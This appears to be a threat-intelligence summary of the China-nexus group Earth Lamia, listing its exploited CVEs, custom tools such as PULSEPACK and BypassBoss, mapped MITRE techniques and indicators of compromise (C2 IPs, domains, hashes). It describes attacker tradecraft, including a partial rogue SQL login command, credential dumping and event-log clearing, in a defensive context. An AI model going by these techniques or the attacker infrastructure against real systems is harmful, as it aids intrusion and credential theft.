Earth Lamia Develops Custom Arsenal to Target Multiple Industries

Earth Lamia is an active China-nexus APT group exploiting web application vulnerabilities to target organizations primarily in Brazil, India, and Southeast Asia since 2023. They use customized hacking tools and backdoors like PULSEPACK and BypassBoss, shifting targets across industries from financial services to IT, universities, and government entities. #EarthLamia #PULSEPACK #BypassBoss

Keypoints

Earth Lamia exploits SQL injection and multiple CVEs (e.g., CVE-2017-9805, CVE-2025-31324) to access public-facing servers and SQL databases.
The group customizes open-source hacking tools and employs DLL sideloading techniques to evade detection, using tools such as “BypassBoss” and loaders for Cobalt Strike and Brute Ratel.
They developed the modular .NET backdoor PULSEPACK, which evolved to use WebSocket communication and dynamically loads plugins from the C2 server.
Targets have shifted over time from financial services to logistics, online retail, and most recently IT companies, universities, and government organizations mainly in Brazil, India, and Southeast Asia.
Lateral movement tactics include privilege escalation (using GodPotato and JuicyPotato), creating administrative accounts, network scanning, credential dumping, and executing backdoors like VShell and Cobalt Strike.
Earth Lamia’s infrastructure and tactics overlap with intrusion sets REF0657 and activities linked to campaigns STAC6451 and CL-STA-0048, though the group has not been observed deploying ransomware.
Trend Vision One™ detects and blocks Earth Lamia IOCs and provides hunting queries, threat insights, and intelligence reports to enhance organizational defense.

MITRE Techniques

[T1595.001] Active Scanning: Scanning IP Blocks – Earth Lamia conducts vulnerability scans on targets’ websites (‘frequently conducted vulnerability scans to identify possible SQL injection vulnerabilities’).
[T1595.002] Active Scanning: Vulnerability Scanning – The actor scans for vulnerabilities in public-facing servers (exploiting CVE-2017-9805, CVE-2021-22205, and others).
[T1592] Gather Victim Host Information – Plugins collect system version, usernames, and antivirus software info (‘collects the information of the infected machine’).
[T1583.001] Acquire Infrastructure: Domains – Uses domains like “chrome-online.site” for C2 infrastructure (‘Cobalt Strike sample connects to “chrome-online[.]site”‘).
[T1190] Exploit Public-Facing Application – Uses SQL injection and exploits multiple vulnerabilities to gain initial access (‘primarily targets the SQL injection vulnerabilities on web applications’).
[T1078] Valid Accounts – Creates accounts such as “sysadmin123” on SQL servers with administrator privileges (‘CREATE LOGIN sysadmin123 WITH PASSWORD …’).
[T1059.001] Command and Scripting Interpreter: PowerShell – Uses PowerShell for downloading tools and execution (‘Using “powershell.exe” to download additional tools’).
[T1059.003] Command and Scripting Interpreter: Windows Command Shell – Executes commands via “cmd.exe” subprocesses for backdoor control (‘the backdoor process can create a subprocess called “cmd.exe”‘).
[T1098.007] Account Manipulation: Additional Local or Domain Groups – Adds created accounts to local administrators (‘adding it to the administrators’ local group’).
[T1136.001] Create Account: Local Account – Creates new local user accounts like “helpdesk”.
[T1053.005] Scheduled Task/Job: Scheduled Task – Uses scheduled tasks for persistence (‘creates a scheduled task to launch the executable after a system reboot’).
[T1505.003] Server Software Component: Web Shell – Deploys webshells to website applications (‘Deploying webshells to website applications’).
[T1068] Exploitation for Privilege Escalation – Uses exploits like GodPotato and JuicyPotato for privilege escalation.
[T1078.003] Valid Accounts: Local Accounts – Uses local accounts for defense evasion and persistence.
[T1140] Deobfuscate/Decode Files or Information – Deobfuscates RC4 and AES encrypted shellcode payloads (‘uses RC4 encryption to protect the malicious shellcode’).
[T1574.001] Hijack Execution Flow: DLL Sideloading – Employs DLL sideloading to launch malicious DLLs via legitimate executables (‘packages hacking tools into DLL files launched via DLL sideloading’).
[T1562.001] Impair Defenses: Disable or Modify Tools – Removes or obfuscates static strings in tools to evade detection.
[T1070.001] Indicator Removal: Clear Windows Event Logs – Cleans event logs using “wevtutil.exe”.
[T1036.005] Masquerading: Match Legitimate Resource Name or Location – Uses legitimate binaries from security vendors for sideloading.
[T1620] Reflective Code Loading – Loads plugins and backdoor components in memory using “Assembly.Load”.
[T1003.001] OS Credential Dumping: LSASS Memory – Dumps credentials from LSASS memory.
[T1003.002] OS Credential Dumping: Security Account Manager – Extracts SAM and SYSTEM hives for credentials.
[T1087.001] Account Discovery: Local Account – Searches for local accounts (‘Account Discovery: Local Account’).
[T1087.002] Account Discovery: Domain Account – Discovers domain accounts.
[T1482] Domain Trust Discovery – Collects domain controller info (‘Collecting domain controller information with “nltest.exe” and “net.exe”’).
[T1570] Lateral Tool Transfer – Transfers tools laterally inside the network.
[T1005] Data from Local System – Collects data locally on compromised systems.
[T1132.001] Data Encoding: Standard Encoding – Uses Base64 encoding for plugin delivery.
[T1573.001] Encrypted Channel: Symmetric Cryptography – Uses AES encryption for communication and plugin payloads.
[T1008] Fallback Channels – Uses fallback C2 communication methods.
[T1105] Ingress Tool Transfer – Downloads tools onto compromised hosts.
[T1104] Multi-Stage Channels – Utilizes multi-stage plugin loading from C2.
[T1095] Non-Application Layer Protocol – Switches from TCP socket to WebSocket for C2 communication.
[T1571] Non-Standard Port – Uses non-standard TCP ports for C2.
[T1041] Exfiltration Over C2 Channel – Exfiltrates victim data over command and control channels.

Indicators of Compromise

[IP Address] Earth Lamia infrastructure and C2 servers – 43.247.135.53, 103.30.76.206 (used for Cobalt Strike C2 and exploitation).
[Domain] Command and Control domains – chrome-online.site (Cobalt Strike C2 domain linked to REF0657 / Earth Lamia), sentinelones.com (C2 domain associated with related campaigns).
[File Hash] Malware samples – SHA256 1d0b246f8d43442ea0eaecde5cfa7fcd8139a9ba93496cd82a8ac056f7393bcf (mscoree.dll malicious loader), SHA256 bb6ab67ddbb74e7afb82bb063744a91f3fecf5fd0f453a179c0776727f6870c7 (VShell sample).
[File Name] Malware and tool names – AppLaunch.exe (legitimate binary used for DLL sideloading), Sophosx64.exe (GodPotato privilege escalation tool), USERENV.dll (Cobalt Strike loader).

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print